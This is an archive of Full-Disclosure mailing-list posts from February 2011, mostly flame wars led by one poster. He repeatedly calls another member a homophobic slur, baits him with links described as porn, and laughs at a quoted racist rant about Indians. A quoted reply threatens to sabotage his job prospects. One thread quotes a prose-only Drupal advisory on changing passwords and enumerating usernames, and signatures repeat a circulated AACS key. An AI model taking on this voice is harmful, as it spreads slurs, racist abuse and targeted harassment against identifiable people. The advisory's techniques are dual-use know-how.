Re: [Full-disclosure] Other recommended lists?

[Cal Leeming [Simplicity Media Ltd]]

But you've not proven anything. All you've done is said "I rest my case".

I refer you also to: http://www.urbandictionary.com/define.php?term=trolling

On Mon, Feb 21, 2011 at 7:12 PM, Paul Schmehl wrote:

> I rest my case.
>
>
> --On February 21, 2011 7:04:33 PM +0000 "Cal Leeming [Simplicity Media
> Ltd]"  wrote:
>
>  And why is that, Paul?
>>
>>
>> On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl 
>> wrote:
>>
>>
>>
>>
>> --On February 21, 2011 6:15:07 PM + "Cal Leeming [Simplicity Media
>> Ltd]"  wrote:
>>
>>
>> Can anyone recommend any decent lists, preferably that are moderated
>> against douchebaggery and trolls (but allow swearing and insults etc),
>> and allows for general security/tech related discussion?
>>
>>
>> Seriously?  I think it's safe to assume you don't understand irony.
>>
>
>
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
> "There are some ideas so wrong that only a very
> intelligent person could believe in them." George Orwell
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

[Cal Leeming [Simplicity Media Ltd]]

Posting a porn thread isn't trolling though. Please explain how on earth
that would be considered trolling?

On Mon, Feb 21, 2011 at 7:08 PM, Mike Hale wrote:

> Your porn thread among others?  Is this is a serious question?
>
> On Mon, Feb 21, 2011 at 11:07 AM, Cal Leeming [Simplicity Media Ltd]
>  wrote:
> > How so?
> >
> > On Mon, Feb 21, 2011 at 7:06 PM, Mike Hale 
> > wrote:
> >>
> >> Probably becuase you've been the biggest troll on this list for the
> >> last few weeks?
> >>
> >> On Mon, Feb 21, 2011 at 11:04 AM, Cal Leeming [Simplicity Media Ltd]
> >>  wrote:
> >> > And why is that, Paul?
> >> >
> >> > On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl <
> pschmehl_li...@tx.rr.com>
> >> > wrote:
> >> >>
> >> >> --On February 21, 2011 6:15:07 PM + "Cal Leeming [Simplicity
> Media
> >> >> Ltd]"  wrote:
> >> >>
> >> >>> Can anyone recommend any decent lists, preferably that are moderated
> >> >>> against douchebaggery and trolls (but allow swearing and insults
> etc),
> >> >>> and allows for general security/tech related discussion?
> >> >>
> >> >> Seriously?  I think it's safe to assume you don't understand irony.
> >> >>
> >> >> --
> >> >> Paul Schmehl, Senior Infosec Analyst
> >> >> As if it wasn't already obvious, my opinions
> >> >> are my own and not those of my employer.
> >> >> ***
> >> >> "It is as useless to argue with those who have
> >> >> renounced the use of reason as to administer
> >> >> medication to the dead." Thomas Jefferson
> >> >> "There are some ideas so wrong that only a very
> >> >> intelligent person could believe in them." George Orwell
> >> >>
> >> >
> >> >
> >> > ___
> >> > Full-Disclosure - We believe in it.
> >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> > Hosted and sponsored by Secunia - http://secunia.com/
> >> >
> >>
> >>
> >>
> >> --
> >> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
> >
> >
>
>
>
> --
> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

[Cal Leeming [Simplicity Media Ltd]]

For accurate definitions of what trolling is, see this:

http://www.urbandictionary.com/define.php?term=trolling

Top definition is:
"Being a prick on the internet because you can. Typically unleashing one or
more cynical or sarcastic remarks on an innocent by-stander, because it's
the internet and, hey, you can."

On Mon, Feb 21, 2011 at 7:09 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Posting a porn thread isn't trolling though. Please explain how on earth
> that would be considered trolling?
>
>
> On Mon, Feb 21, 2011 at 7:08 PM, Mike Hale wrote:
>
>> Your porn thread among others?  Is this is a serious question?
>>
>> On Mon, Feb 21, 2011 at 11:07 AM, Cal Leeming [Simplicity Media Ltd]
>>  wrote:
>> > How so?
>> >
>> > On Mon, Feb 21, 2011 at 7:06 PM, Mike Hale 
>> > wrote:
>> >>
>> >> Probably becuase you've been the biggest troll on this list for the
>> >> last few weeks?
>> >>
>> >> On Mon, Feb 21, 2011 at 11:04 AM, Cal Leeming [Simplicity Media Ltd]
>> >>  wrote:
>> >> > And why is that, Paul?
>> >> >
>> >> > On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl <
>> pschmehl_li...@tx.rr.com>
>> >> > wrote:
>> >> >>
>> >> >> --On February 21, 2011 6:15:07 PM + "Cal Leeming [Simplicity
>> Media
>> >> >> Ltd]"  wrote:
>> >> >>
>> >> >>> Can anyone recommend any decent lists, preferably that are
>> moderated
>> >> >>> against douchebaggery and trolls (but allow swearing and insults
>> etc),
>> >> >>> and allows for general security/tech related discussion?
>> >> >>
>> >> >> Seriously?  I think it's safe to assume you don't understand irony.
>> >> >>
>> >> >> --
>> >> >> Paul Schmehl, Senior Infosec Analyst
>> >> >> As if it wasn't already obvious, my opinions
>> >> >> are my own and not those of my employer.
>> >> >> ***
>> >> >> "It is as useless to argue with those who have
>> >> >> renounced the use of reason as to administer
>> >> >> medication to the dead." Thomas Jefferson
>> >> >> "There are some ideas so wrong that only a very
>> >> >> intelligent person could believe in them." George Orwell
>> >> >>
>> >> >
>> >> >
>> >> > ___
>> >> > Full-Disclosure - We believe in it.
>> >> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> > Hosted and sponsored by Secunia - http://secunia.com/
>> >> >
>> >>
>> >>
>> >>
>> >> --
>> >> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>> >
>> >
>>
>>
>>
>> --
>> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

[Cal Leeming [Simplicity Media Ltd]]

Ah I've used IRC since I was 10 years old ;o See this kinda shit never
really goes down on IRC or 4chan.. but the moment you bring a mailing list
or forum into the equasion, it's like some people just turn into super
grammar warriors / douche bags, and I've no idea why :S

On Mon, Feb 21, 2011 at 6:53 PM, Michael Krymson  wrote:

> Swearing? Several. Insults? I think most people would include that under
> douchebaggery. What you want probably fits better under forums or IRC chans
> rather than mailing lists.
>
> Not to state the obvious, but I've not personally been subjected to
> n3ttie's emails for some time, except when people include them in their
> responses...
>
> If there is someone you think is n3ttie posting under some other name, keep
> in mind he has always been decidedly non-technical and it is not terribly
> hard to pick his tone/style/subjects out of a crowd. It wouldn't take a
> doctorate to analyze the text.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

[Cal Leeming [Simplicity Media Ltd]]

How so?

On Mon, Feb 21, 2011 at 7:06 PM, Mike Hale wrote:

> Probably becuase you've been the biggest troll on this list for the
> last few weeks?
>
> On Mon, Feb 21, 2011 at 11:04 AM, Cal Leeming [Simplicity Media Ltd]
>  wrote:
> > And why is that, Paul?
> >
> > On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl 
> > wrote:
> >>
> >> --On February 21, 2011 6:15:07 PM + "Cal Leeming [Simplicity Media
> >> Ltd]"  wrote:
> >>
> >>> Can anyone recommend any decent lists, preferably that are moderated
> >>> against douchebaggery and trolls (but allow swearing and insults etc),
> >>> and allows for general security/tech related discussion?
> >>
> >> Seriously?  I think it's safe to assume you don't understand irony.
> >>
> >> --
> >> Paul Schmehl, Senior Infosec Analyst
> >> As if it wasn't already obvious, my opinions
> >> are my own and not those of my employer.
> >> ***
> >> "It is as useless to argue with those who have
> >> renounced the use of reason as to administer
> >> medication to the dead." Thomas Jefferson
> >> "There are some ideas so wrong that only a very
> >> intelligent person could believe in them." George Orwell
> >>
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

[Cal Leeming [Simplicity Media Ltd]]

And why is that, Paul?

On Mon, Feb 21, 2011 at 7:03 PM, Paul Schmehl wrote:

> --On February 21, 2011 6:15:07 PM +0000 "Cal Leeming [Simplicity Media
> Ltd]"  wrote:
>
>  Can anyone recommend any decent lists, preferably that are moderated
>> against douchebaggery and trolls (but allow swearing and insults etc),
>> and allows for general security/tech related discussion?
>>
>
> Seriously?  I think it's safe to assume you don't understand irony.
>
> --
> Paul Schmehl, Senior Infosec Analyst
> As if it wasn't already obvious, my opinions
> are my own and not those of my employer.
> ***
> "It is as useless to argue with those who have
> renounced the use of reason as to administer
> medication to the dead." Thomas Jefferson
> "There are some ideas so wrong that only a very
> intelligent person could believe in them." George Orwell
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Other recommended lists?

[Cal Leeming [Simplicity Media Ltd]]

Sorry I should re-phrase, this kinda stuff does go down on 4chan/irc, but
they are more upfront about it. A few random insults fly, and that's about
it. It's not a constant going flow of bitchyness, unless you bring dalnet
into the equation lol.

On Mon, Feb 21, 2011 at 6:57 PM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:

> Ah I've used IRC since I was 10 years old ;o See this kinda shit never
> really goes down on IRC or 4chan.. but the moment you bring a mailing list
> or forum into the equasion, it's like some people just turn into super
> grammar warriors / douche bags, and I've no idea why :S
>
> On Mon, Feb 21, 2011 at 6:53 PM, Michael Krymson wrote:
>
>> Swearing? Several. Insults? I think most people would include that under
>> douchebaggery. What you want probably fits better under forums or IRC chans
>> rather than mailing lists.
>>
>> Not to state the obvious, but I've not personally been subjected to
>> n3ttie's emails for some time, except when people include them in their
>> responses...
>>
>> If there is someone you think is n3ttie posting under some other name,
>> keep in mind he has always been decidedly non-technical and it is not
>> terribly hard to pick his tone/style/subjects out of a crowd. It wouldn't
>> take a doctorate to analyze the text.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Other recommended lists?

[Cal Leeming [Simplicity Media Ltd]]

Can anyone recommend any decent lists, preferably that are *moderated *against
douchebaggery and trolls (but allow swearing and insults etc), and allows
for general security/tech related discussion?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

http://bit.ly/gOq1x2

More porn from Andrew :)

On Mon, Feb 21, 2011 at 3:22 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Mon, Feb 21, 2011 at 12:14 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > I should remove the company name from my emails
>
> You breaking the law by threatening violence is nothing to do with your
> "company", nor is discrimination.
>
> It's you on a personal level in that, your comments have been forwarded to
> law enforcement folks.
>
> Also, note that some of my members are SIA approved in self-defence and
> restraining techniques.
>
> If you were to approach me at a public event, you would be restrained and
> put into a citizens arrest situation and the police called.
>
> I assure you your comments towards me have been noted and measures taken to
> make sure you cannot carry out your threat, or get away with your
> discriminatory behaviour.
>
> Your comments are also forwarded to BBC producers to up date them on what
> you've been saying on this mailing list.
>
> Any potential employers in the IT Security industry you may have had, are
> already aware of you as they've been reading your emails and are unlikey to
> offer you a position.
>
>
> I know I have already forwarded your comments to my mailing list, to make
> sure everyone in my consortium is aware of what you've been saying to me.
>
> I'm already in contact with folks I know from the industry in Coventry to
> make sure you have a hard time getting hired in the future in your local
> area.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] University of Central Florida Multiple LFI / Dirty Indian rant

[Cal Leeming [Simplicity Media Ltd]]

lmao.

On Mon, Feb 21, 2011 at 3:04 PM, Eyeballing Weev
wrote:

> My name is Endia Pakistan.
> I am from Pakistan
> I want to know why you dirty, dirty Indian mud people are doing here in
> America.
>
> I violate the corpses floating in the Ganges River.
>
> Why does India have so many people but so few toilets and they waste
> their money by putting the likes of you online?
>
> On 02/21/2011 08:48 AM, Nikhil Mittal wrote:
> >
> >  >>Madhur Ahuja and "Hack Talk" are obviously from third world countries
> >  >>and are only doing this for publicity
> >
> >
> > So fag, what you would have done it for ? Free gay sex with
> > Administrators from the University ?
> >
> > You felt bad if kids from so called "Third World" countries used FD for
> > some adventure. Come on get past this "Third World" mentality.
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Abuse of Functionality vulnerabilities in Drupal

[Cal Leeming [Simplicity Media Ltd]]

Anyone aware of this being abused in the wild?

On Mon, Feb 21, 2011 at 3:11 PM, tc  wrote:

> -
>  Timeline:
> -
>
> 2009.03.05 - disclosed at http://www.madirish.net/?article=239
> 2009.03.15 - posted to FD (http://seclists.org/fulldisclosure/2009/Mar/115
> )
> 2009.03.15 - 2010.12.20 - No one gave a fuck
> 2010.12.20 - MustLive announced at my site.
> 2010.12.21 - MustLive informed developers.
> 2011.02.18 - disclosed at MustLive's site.
> 2011.02.18 - current - Everyone continued to not give a fuck
>
>
>
> On Mon, Feb 21, 2011 at 11:00 PM, Justin Klein Keane
>  wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> >
> > - 
> > Timeline:
> > - 
> >
> > 2009.03.05 - disclosed at http://www.madirish.net/?article=239
> > 2009.03.15 - posted to FD (
> http://seclists.org/fulldisclosure/2009/Mar/115)
> > 2010.12.20 - MustLive announced at my site.
> > 2010.12.21 - MustLive informed developers.
> > 2011.02.18 - disclosed at MustLive's site.
> >
> > Justin C. Klein Keane
> > http://www.MadIrish.net
> >
> > The digital signature on this message can be confirmed
> > using the public key at http://www.madirish.net/gpgkey
> >
> > On 02/19/2011 02:28 PM, MustLive wrote:
> >> Hello list!
> >>
> >> I want to warn you about Abuse of Functionality vulnerabilities in
> Drupal.
> >>
> >> -
> >> Affected products:
> >> -
> >>
> >> Vulnerable are Drupal 6.20 and previous versions.
> >>
> >> --
> >> Details:
> >> --
> >>
> >> Abuse of Functionality (WASC-42):
> >>
> >> There is unreliable mechanism of changing password in the system. In
> user
> >> profile (http://site/user/1/edit) it's possible to change password
> without
> >> knowing of current password. And even there is protection against CSRF
> in
> >> the form, this will not protect against Abuse of Functionality.
> >>
> >> Because with using of XSS vulnerabilities it's possible to bypass this
> >> protection and conduct remote attack for changing of the password
> (including
> >> administrator's one). Or at session hijacking via XSS it's possible to
> get
> >> into account and change the password. Or it's possible to do that at
> >> temporarily access to user's computer, from which he logged in to his
> >> account.
> >>
> >> Abuse of Functionality (WASC-42):
> >>
> >> Besides two before-mentioned methods (http://websecurity.com.ua/4763/),
> >> there are the next methods for enumerating of logins of the users.
> >>
> >> At the forum (http://site/forum) logins of the users show, which posted
> at
> >> the forum (opened a topic or wrote a comment).
> >>
> >> In section Recent posts (http://site/tracker) at pages "All last posts"
> and
> >> "My posts" logins of the users show, which wrote posts at the site.
> Attack
> >> is possible to conduct only for logged in users.
> >>
> >> In posts of the blog (http://site/content/post), and also in comments
> to
> >> blog posts and other pages of the site (http://site/page) logins of the
> >> users show, which made a post in blog or made a comment.
> >>
> >> In password recovery form (http://site/user/password) it's possible on
> find
> >> existent logins and e-mails of the users at the site. If to send
> incorrect
> >> login or e-mail then the message shows "Sorry, ... is not recognized as
> a
> >> user name or an e-mail address.", and if to send correct login or
> e-mail,
> >> then this message will not show.
> >>
> >> 
> >> Timeline:
> >> 
> >>
> >> 2010.12.20 - announced at my site.
> >> 2010.12.21 - informed developers.
> >> 2011.02.18 - disclosed at my site.
> >>
> >> I mentioned about these vulnerabilities at my site
> >> (http://websecurity.com.ua/4776/).
> >>
> >> Best wishes & regards,
> >> MustLive
> >> Administrator of Websecurity web site
> >> http://websecurity.com.ua
> >>
> >>
> >> ___
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> > -BEGIN PGP SIGNATURE-
> > Version: GnuPG v1.4.11 (GNU/Linux)
> > Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/
> >
> > iPwEAQECAAYFAk1ifhMACgkQkSlsbLsN1gBIGwb/b+4L5kuSZergm1xuNle4JMeC
> > itwiMfMzmFjWFJojO/+h65iKjkVyzVeZdscZHT+yIXIr0C2WpmxoVukALd184gWB
> > t3XfGO0cGche3dqZOcCCMHS6thJREKwSNqilxoYV4Wizmz9C2P9OullXhudRIefp
> > 7CxX/O2U7oJgAbnJNNjUGNPotee4SzFCLdwN4KHXNVrCorVIViIPDMZT2BxU6cct
> > jhp8QFQ5tVXwamdhbA5s+ALnmXc4rvedjYQesrre3c9IAh0IWL/6bYtXcluTDGP7
> > OJD2Yj5VjnriJSGErsM=
> > =1WaJ
> > -END PGP SIGNATURE-
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.g

Re: [Full-disclosure] New tool for penetration testing!!!

[Cal Leeming [Simplicity Media Ltd]]

Has anyone actually tried it yet?

On Mon, Feb 21, 2011 at 1:18 PM, James Lay  wrote:

> From: runlvl 
> Date: Mon, 21 Feb 2011 02:57:58 -0300
> To: Full-disclosure 
> Subject: [Full-disclosure] New tool for penetration testing!!!
>
> Insecurity Research is happy to announce the release of version 2.0,
> get it now while it is still hot !
>
> Insect Pro 2.0 is a penetration security auditing and testing software
> solution designed to allow organizations of all sizes mitigate,
> monitor and manage the latest security threats vulnerabilities.
>
> We’re always working to improve Insect Pro and now the users obtain
> all the metasploit functionalities plus all the Insect Pro modules
> merge all in a unique application.
>
> We invite you to take a visual tour where you can find screen shots and
> videos, visit us at http://www.insecurityresearch.com
>
> We are really thankful with the community, thanks for all your support
> that keep us coding!
>
> There is no fixed price to get it, you can obtain the full version
> with updates from $20 !
>
> Get it now from: http://www.insecurityresearch.com
>
>
>
>
> This is really starting to look like spam…..
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

http://www.urbandictionary.com/define.php?term=friends

<http://www.urbandictionary.com/define.php?term=friends>lmao.

On Mon, Feb 21, 2011 at 12:44 PM, Benji  wrote:

> including friends, girl/boyfriend, cocaine
>
> On Mon, Feb 21, 2011 at 12:11 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
>
>> But, Njinjte is awesome, period. :D And trust me, when you have kids,
>> you'll learn to love all the things your kids love (this includes childrens
>> tv programmes, characters, teddys etc lol).
>>
>> On 21 Feb 2011 10:58, "huj huj huj"  wrote:
>>
>> hello kitty? really? is your girlfriend 14?
>>
>> 2011/2/19 Cal Leeming [Simplicity Media Ltd] <
>> cal.leem...@simplicitymedialtd.co.uk>
>>
>>> >
>>> > Andrew,
>>> >
>>> > Me and my girl made you a little gift, just for you! (no it's not porn
>>> lol)
>>> >
>>> > http...
>>>
>>> > ___
>>> > Full-Disclosure - We believe in it.
>>> > Charter: h...
>>>
>>>
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

The fact you said /b/tard says otherwise :S

On 21 Feb 2011 10:51, "huj huj huj"  wrote:

we are not your /b/tarded /b/rothers



2011/2/19 Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk>

> >
> > LMAO, no.
> >
> > But Andrew, thank you for giving me yet another opportunity to treat our
> fellow /b...
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: h...
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

Finally, a response worthy of a non porn reply! Well done AndyPants!

You're not entirely correct. But you do hold a valid point that I should
remove the company name from my FD emails and/or add a liability disclaimer
in the footer. But footers suck for mailing lists, and you really are a
complete and total faggot (see urbandictionary for alternative meanings,
trying to be a grammar whore isn't going to help you here). So, we'll see :D

On 21 Feb 2011 11:26, "andrew.wallace" 
wrote:

On Sun, Feb 20, 2011 at 12:54 AM, Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk> wrote:
> you fucking faggot

What Cal doesn't realise is, not only are threats of violence against the
law, but discrimination in the work place over sexual orientation is also
against the law.

He isn't doing well in convincing us that he's a reformed criminal, maybe he
was just telling porkies to the BBC.

http://www.bbc.co.uk/insideout/content/articles/2008/04/09/west_midlands_hackers_s13_w7_feature.shtml

http://www.youtube.com/watch?v=p8IjLnMYZXo

Andrew
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

But, Njinjte is awesome, period. :D And trust me, when you have kids, you'll
learn to love all the things your kids love (this includes childrens tv
programmes, characters, teddys etc lol).

On 21 Feb 2011 10:58, "huj huj huj"  wrote:

hello kitty? really? is your girlfriend 14?

2011/2/19 Cal Leeming [Simplicity Media Ltd] <
cal.leem...@simplicitymedialtd.co.uk>

> >
> > Andrew,
> >
> > Me and my girl made you a little gift, just for you! (no it's not porn
> lol)
> >
> > http...
>
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: h...
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

Whoa, that went *completely* over my head lol ;(

On 20 Feb 2011 02:17,  wrote:

On Sat, 19 Feb 2011 20:10:59 GMT, "Cal Leeming [Simplicity Media Ltd]" said:
> Son, this is how we d...
Unfortunately, he's probably been around longer than you have...


> On Sat, Feb 19, 2011 at 5:31 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> > We know you're desperate for attention when you post pictures of
yourself
> > to the public doma...
But he still doesn't make sense.  A security professional who's been around
as long as he has should know that in any Bern convention signatory nation,
merely posting a picture does *not* release it into the "public domain",
and that in fact it's (depending on the nation) somewhere between difficult
and impossible to actually release something into public domain before the
copyright has expired.  Therefore, we are obviously being trolled by
a fake Andrew...
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

LMFAO. Omg, I just lol'd so hard, you fucking faggot lmao. I would have
posted more porn, but I'm on my phone in bed, so it'll have to wait. Much
love. <3 x x

On 20 Feb 2011 00:45, "andrew.wallace" 
wrote:

On Sat, Feb 19, 2011 at 8:10 PM, Cal Leeming [Simplicity Media Ltd]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

Here's the closest thing I have to Hello Kitty.

http://bit.ly/e04RrC

It's us with Nijntje - the little rabbit from the picture, she's much better
than hello kitty! - see http://www.nijntje.nl/ )

We went to the Dick Bruna store in Utrecht and brought tons of Nijntje
stuff, and we spent 3 hours looking for her statue, but it was totally worth
it :D

On Sat, Feb 19, 2011 at 5:26 PM, Hack Talk  wrote:

> I say we need moar Hello Kitty and less flamewars
>
>
> Luis Santana
>
>
>
> On Sat, Feb 19, 2011 at 12:20 PM, Psychobilly  wrote:
>
>> >From the distant
>> I can feel
>> The creeping smell
>> Of sudden life leaks
>> Tar is packaging
>> The network is hungry.
>>
>>
>> Le 19/02/2011 17:26, Cal Leeming [Simplicity Media Ltd] a écrit :
>> > Andrew,
>> >
>> > Me and my girl made you a little gift, just for you! (no it's not porn
>> lol)
>> >
>> > http://bit.ly/ftK9VF
>> >
>> > Much love, Cal <3
>> >
>> > On Sat, Feb 19, 2011 at 2:42 PM, andrew.wallace
>> > mailto:andrew.wall...@rocketmail.com>>
>> > wrote:
>> >
>> > On Sat, Feb 19, 2011 at 2:08 PM, Cal Leeming [Simplicity Media Ltd]
>> > > > <mailto:cal.leem...@simplicitymedialtd.co.uk>> wrote:
>> > > no.
>> >
>> > A colleague of mine approached me today and mentioned all my emails
>> > are appearing on Full-Disclosure mailing list.
>> >
>> > Why do you forward all my off list emails to the disclosure
>> > community? Is it some sort of attention seeking exercise?
>> >
>> > A kind of, 'look who sends me private emails I must be someone
>> > important'?
>> >
>> > Andrew
>> >
>> >
>> >
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

Son, this is how we deal with newfags on 4chan, and you sir, are a newfag.

Here's some more porn:

http://bit.ly/gVyp0R

Getting bored yet?

On Sat, Feb 19, 2011 at 5:31 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Sat, Feb 19, 2011 at 4:26 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > Andrew,
> > Me and my girl made you a little gift, just for you! (no it's not porn
> lol)
>
> We know you're desperate for attention when you post pictures of yourself
> to the public domain.
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (a present for andrew wallace, with love from cal)‏

[Cal Leeming [Simplicity Media Ltd]]

Andrew,

Me and my girl made you a little gift, just for you! (no it's not porn lol)

http://bit.ly/ftK9VF

Much love, Cal <3

On Sat, Feb 19, 2011 at 2:42 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Sat, Feb 19, 2011 at 2:08 PM, Cal Leeming [Simplicity Media Ltd] <
> cal.leem...@simplicitymedialtd.co.uk> wrote:
> > no.
>
> A colleague of mine approached me today and mentioned all my emails are
> appearing on Full-Disclosure mailing list.
>
> Why do you forward all my off list emails to the disclosure community? Is
> it some sort of attention seeking exercise?
>
> A kind of, 'look who sends me private emails I must be someone important'?
>
> Andrew
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] (this thread is now about porn).‏

[Cal Leeming [Simplicity Media Ltd]]

LMAO, no.

But Andrew, thank you for giving me yet another opportunity to treat our
fellow /b/rothers to more tasty treats!

http://bit.ly/f6eCBc

Enjoy :)

On Sat, Feb 19, 2011 at 10:42 AM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> On Fri, Feb 18, 2011 at 7:28 PM, Cal Leeming [Simplicity Media Ltd] <
